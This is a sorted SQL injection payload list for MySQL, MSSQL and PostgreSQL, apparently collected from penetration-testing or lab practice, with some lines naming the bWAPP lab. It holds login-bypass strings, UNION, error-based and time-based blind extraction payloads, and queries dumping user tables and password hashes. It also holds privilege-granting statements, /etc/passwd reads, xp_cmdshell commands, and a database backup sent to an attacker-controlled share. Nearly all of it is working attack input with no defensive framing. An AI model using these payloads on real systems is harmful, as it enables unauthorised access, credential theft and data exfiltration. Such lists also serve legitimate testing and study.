0' UNION SELECT ALL 1,user(),3,4,5,6,7,8,9,10--
0' UNION SELECT ALL @@version,2,3,4,5,6,7,8,9,10--
0' UNION SELECT ALL @@version,2,3,4,5,6,7,8--
0' UNION SELECT ALL @@version,2,3,4,5,6,7,8.9--
0' UNION SELECT ALL @@version,2,3,4,5,6,7--
0' UNION SELECT ALL @@version,2,3,4,5,6--
0' UNION SELECT ALL @@version,2,3,4,5--
0' UNION SELECT ALL @@version,2,3,4--
0' UNION SELECT ALL @@version,2,3--
0' UNION SELECT ALL @@version,2--
0' UNION SELECT ALL @@version--
0' UNION SELECT ALL database(),2,3,4,5,6,7,8,9,10--
0' UNION SELECT ALL database()--
0' UNION SELECT ALL table_name,2 from information_schema.tables--
0' UNION SELECT ALL table_name,2,3 from information_schema.tables--
0' UNION SELECT ALL user(),2,3,4,5,6,7,8,9,10--
1
1 AND 1=1
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 116
1 AND USER_NAME() = \'dbo\'
1 EXEC XP_
1 OR 1=1
1 UNI/**/ON SELECT ALL FROM WHERE
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\' --
1 and 1=1
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 and user_name() = 'dbo'
1 exec sp_ (or exec xp_)
1 or 1=1
1 uni/**/on select all from where
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1%' and '1%'='1
1'
1' and '1'='1
1' and 1=(select count(*) from tablenames); --
1' and non_existant_table = '1
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
1' or '1'='1
1'1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1='1
1\' AND 1=(SELECT COUNT(*) FROM tablenames); --
1\' AND non_existant_table = \'1
1\' OR \'1\'=\'1
1\'1
1\\\'1
;%00
<username>' OR 1=1--
<username>'--
?id=(1)and(1)=(1)--
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
?id=1 and a=a --
?id=1%09and%091=1%09--
?id=1%0Aand%0A1=1%0A--
?id=1%0Band%0B1=1%0B--
?id=1%0Cand%0C1=1%0C--
?id=1%0Dand%0D1=1%0D--
?id=1%A0and%A01=1%A0--
?id=1/*comment*/and/**/1=1/**/--
AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.TABLES GROUP BY a LIMIT 0,1)b)--
AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)--
AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.schemata GROUP BY a LIMIT 0,1)b)--
AND (SELECT version()) LIKE "5%"--
AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))) > 95--
AND (ascii(substr((SELECT column1 FROM database2.table1 LIMIT 0,1),1,1))) > 95--
AND (ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1))) > 95--
AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1))) > 95--
AND (ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1))) > 95--
AND (ascii(substr((SELECT version()),1,1))) > 52--
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns)); 
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns); 
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables));
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables);
AND 1=1
AND 1=2
AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))))> 95,sleep(10),NULL)--
AND IF(((ascii(substr((SELECT column1 FROM database1.table1 LIMIT 0,1),1,1)))) >95,sleep(10),NULL)--
AND IF(((ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--
AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--
AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--
AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)--
AND IF((SELECT version()) LIKE "5%",sleep(10),NULL)--
AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A';
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'; 
AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_NAME="table1" LIMIT 0,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM database2.table1 LIMIT 0,1)))--
AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM table1 LIMIT 0,1)))--
AND extractvalue(rand(),concat(0x3a,version()))--
AND sleep(10)--
AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM database2.table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--
AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
BENCHMARK(1000000,MD5('x')),null) FROM login
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
CREATE USER test1 IDENTIFIED BY 'pass 1'
DESC, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)
DROP USER test1
DROP USER test1;
GRANT ALL PRIVILEGES ON *.* TO test1 @'%
GRANT ALL PRIVILEGES ON *.* TO test@'%';
INSERT INTO login SET user = 'r00t', pass = 'abc'
Number of columns
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
SELECT * FROM login /* foobar */
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
SELECT * FROM login WHERE user =
SELECT * FROM login WHERE user = 'root'
SELECT * FROM login WHERE user = 0x726F6F74
SELECT * FROM login WHERE user = CHAR(39,97,39)
SELECT * FROM table ORDER BY ID LIMIT 3,1
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'username'
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT /*comment*/1 
SELECT 0.1 <= 2;
SELECT 1 #comment 
SELECT 1 && 1;
SELECT 1 XOR 0;
SELECT 1 || 1;
SELECT 2 >= 2;
SELECT 6 & 1
SELECT 6 & 2
SELECT @ @datadir
SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
SELECT @@version
SELECT BENCHMARK(1000000,MD5(CHAR(116)))
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
SELECT BENCHMARK(10000000,MD5(CHAR(116)))
SELECT COUNT(*) FROM tablename
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT FLOOR(7 + (RAND() * 5));
SELECT HEX('root');
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
SELECT ISNULL(1/0);
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
SELECT ROUND(23.298, -1);
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');
SELECT SUSER_SNAME();
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT USER_NAME(2);
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' limit 1 offset 1   
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' limit 1 offset 2
SELECT current_user;
SELECT database()
SELECT distinct(db) FROM mysql.db 
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';
SELECT host, user, password FROM mysql.user 
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0 
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1 
SELECT host,user,password FROM user into outfile '/tmp/passwd';
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
SELECT name FROM master..sysdatabases;
SELECT password FROM tablename WHERE username =
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
SELECT schema_names FROM information_schema.schemata 
SELECT substr('Foobr', 1, 1);
SELECT substr('abcd', 3, 1)
SELECT substr('database()', 1, 1);
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name='username'
SELECT table_schema,table_name FROM information_schema.tables
SELECT table_schema,table_name,column_name FROM information_schema.columns
SELECT user FROM login WHERE user =
SELECT user FROM login WHERE user = 'admin'
SELECT user FROM login WHERE user = 'root'
SELECT user FROM mysql.user 
SELECT user;
UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM database2.table1--
UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM table1--
UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='database1'--
UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'--
UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata--
UNION ALL SELECT NULL,version()--
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename'); 
UNION SELECT name FROM master..sysobjects WHERE xtype='U';    
UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
Using an HEX encoded query to bypass escaping.
WHERE x = 0xbf27admin 0xbf27
Worked till 4, and got a 500 internal server error for 5. This means we have 4 columns to work with.
\' OR username IS NOT NULL OR username = \'
\'; desc users; --
\\\'; DESC users; --
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
and 0=benchmark(3000000,MD5(1))%20/*
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
copy myfile from '/etc/passwd'; 
create table myfile (input TEXT);
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspa'" select * from myfile"--
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
d' union select 1,username,3,4 from sysadmin.users-- -
exec master..xp_cmdshell 'ipconfig+/all'	
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'ping+<attackerip>'
f' UNION SELECT 1,table_name, column_name FROM information_schema.columns,4-- -
f' UNION SELECT 1,table_name,column_name,4 FROM information_schema.tables-- -
f' UNION SELECT table_schema,table_name FROM information_schema.tables-- -
f' union select 1,table_name,3,4 from information_schema.tables-- -
f' union select null,table_schema from information_schema.tables,null,null-- -
hello world',(select * from bWAPP.users where id=1 limit 0,1))--
hello world',(select * from databases() where id=1 limit 0,1))--
hello world',(select @@datadir))--
hello world',(select @@version))--
hello world',(select databases()))--
hello world',(select password from bWAPP.users where id=1 limit 0,1))--
hello world',(select system_user())--
hello world',(select user()))--
insert into login set user = 0×726F6F74, pass = 0×726F6F74
insert into login set user = ‘root’, pass = ‘root’
or 1=1
or 1=1#
or 1=1--
or 1=1/*
s' UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- -
s' union select all null,database(),null,null-- -
select * from master..sysserverse
select * from myfile;copy myfile to /tmp/test;
select * from pg_group;
select * from pg_shadow;
select * from sysusers
select @@microsoftversione
select @@servernamee
select @@version
select current_database();
select current_setting('config_file');
select current_setting('data_directory');
select current_setting('hba_file');
select current_setting('krb_server_keyfile');
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('password_encryption');
select current_setting('port');
select current_setting('virtual_host');
select current_user;
select session_user;
select version();	
test"
test'
test' AND (SELECT count(*) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME')=5 AND '1'='1
test' AND (SELECT count(COLUMNNAME) FROM TABLENAME)= 13 AND '1'='1
test' AND ascii(substring((SELECT COLUMNNAME FROM TABLENAME LIMIT 0, 1),1,1))=65 AND '1'='1
test' AND ascii(substring((SELECT COLUMNNAME FROM TABLENAME LIMIT 0, 1),2,1))=65 AND '1'='1
test' AND ascii(substring((SELECT COLUMNNAME FROM TABLENAME LIMIT 1, 1),1,1))=65 AND '1'='1
test' AND ascii(substring((SELECT COLUMNNAME FROM TABLENAME LIMIT 1, 1),2,1))=65 AND '1'='1
test' AND length((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 0, 1))=7 and '1'='1
test' AND length((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 1, 1))=7 and '1'='1
test' and (SELECT count(*) FROM information_schema.tables WHERE table_schema=database())=6 and '1'='1
test' and ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 0, 1),1,1))=65 and '1'='1
test' and ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 0, 1),2,1))=65 and '1'='1
test' and ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 1, 1),1,1))=65 and '1'='1
test' and ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLENAME' LIMIT 1, 1),2,1))=65 and '1'='1
test' and ascii(substring((SELECT current_user()),1,1))=115 AND '1'='1
test' and ascii(substring((SELECT current_user()),2,1))=100 AND '1'='1
test' and ascii(substring((SELECT database()),1,1))=115 AND '1'='1
test' and ascii(substring((SELECT database()),2,1))=107 AND '1'='1
test' and ascii(substring((SELECT version()),1,1))=53 AND '1'='1
test' and ascii(substring((SELECT version()),2,1))=46 AND '1'='1
test' and length((SELECT table_name FROM information_schema.tables WHERE table_schema=database() AND table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0, 1))=10 AND '1'='1
test' and length(SELECT version())=15 AND '1'='1
test' and length(current_user())=15 AND '1'='1
test' and length(database())=1 and '1'='1
test' and length(database())=10 and '1'='1
test' and length(database())=2 and '1'='1
test' and length(database())=3 and '1'='1
test' and length(database())=4 and '1'='1
test' and length(database())=5 and '1'='1
test' and length(database())=6 and '1'='1
test' and length(database())=7 and '1'='1
test' and length(database())=8 and '1'='1
test' and length(database())=9 and '1'='1
test' order by 1--
test' order by 10--
test' order by 11--
test' order by 12--
test' order by 2--
test' order by 3--
test' order by 4--
test' order by 5--
test' order by 6--
test' union select 1, null, null, null, null--
test' union select null, '1', null, null, null--
test' union select null, (SELECT COLUMNNAME FROM TABLENAME LIMIT 0, 1), null, null, null--
test' union select null, (SELECT COLUMNNAME FROM TABLENAME LIMIT 1, 1), null, null, null--
test' union select null, (SELECT count(COLUMNNAME) FROM TABLENAME), null, null, null--
test' union select null, (SELECT count(table_name) FROM information_schema.tables WHERE table_schema=database() AND table_schema != 'mysql' AND table_schema != 'information_schema'), null, null, null--
test' union select null, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() AND table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 0, 1), null, null, null--
test' union select null, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() AND table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1, 1), null, null, null--
test' union select null, current_use(), null, null, null--
test' union select null, database(), null, null, null--
test' union select null, null, null, null, null--
test' union select null, version(), null, null, null--
thes' union select 1,TABLE_SCHEMA,TABLE_NAME FROM information_schema.tables,4-- -
thes' union select all 1,table_name, table_schema from information_schema.columns,4-- -
thes' union select all 1,table_name,3,4 FROM information_schema.tables-- -
thes' union select all 1,user(),3,4-- -
thes' union+select+1,(select+group_concat(username,0x3a,password) from sysadmin.users
this')+union+select+1,(select+group_concat(username,0x3a,password)+from+sysadmin.users)#
this')union+select+all+1,column_name+from+information_schema.columns+where+table_name='users'#
this')union+select+all+1,table_name+from+information_schema.tables+where+table_schema='sysadmin'#
​admin' or 1=1-- -
​admin' union select 1,2,3,4-- -
​admin' union select 1,@@version,3,4-- -
​admin' union select 1-- -
​d' union select 1,(select group_concat(username,0x3a,password) from sysadmin.users-- -
​f' union select 1,table_name,3,4 from information_schema.tables-- -
​f' union select null,table_name,null,null FROM information_schema.tables-- -
​thes' order by 1-- -
​thes' union all select 1,2,concat(name, 0x3A , password),4 from users-- -
​thes' union select all 1,@@version,3,4-- -
​thes' union select all 1,database(),3,4-- -
​thes' union select all 1,table_schema from information_schema.tables-- -
​thes')order by 3#
﻿'; exec master..xp_cmdshell 'ping 10.10.1.2'--
